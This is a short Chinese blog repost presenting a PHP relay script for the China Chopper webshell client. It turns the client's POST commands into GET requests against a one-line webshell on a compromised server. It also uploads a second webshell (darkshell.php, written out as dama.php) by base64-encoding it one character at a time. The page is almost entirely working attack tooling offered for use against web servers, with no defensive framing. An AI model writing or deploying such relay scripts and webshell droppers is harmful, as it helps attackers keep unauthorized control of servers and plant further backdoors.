PHP 菜刀中转脚本

admin 2023年12月15日00:52:26评论5 views字数 675阅读2分15秒阅读模式

有的服务器 管理员脑抽把 POST 方法禁止

而菜刀是利用 POST 来发送执行代码的

只要把 POST 转换成 GET 就可以正常链接了

<?php
ini_set('max_execution_time', '100'); // 超时时间

$url = 'http://127.0.0.1/cmd.php'; // 一句话地址
$pass = 'cmd'; // 密码
$data = $_POST['cmd']; // 中转密码

echo file_get_contents($url.'?'.$pass.'='.$data);

if(isset($_GET['upload'])){
	$f = fopen('darkshell.php','r'); // 上传文件
	while (!feof($f)){
		$content = base64_encode(fgetc($f));
		$exec = "file_put_contents('dama.php',base64_decode('$content'),FILE_APPEND);";
		file_get_contents($url.'?'.$pass.'='.$exec);
	}
	echo 'File uploaded successfully';
}
?>

- By:X1r0z[exp10it.cn]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月15日00:52:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHP 菜刀中转脚本https://cn-sec.com/archives/2299200.html

发表评论

匿名网友 填写信息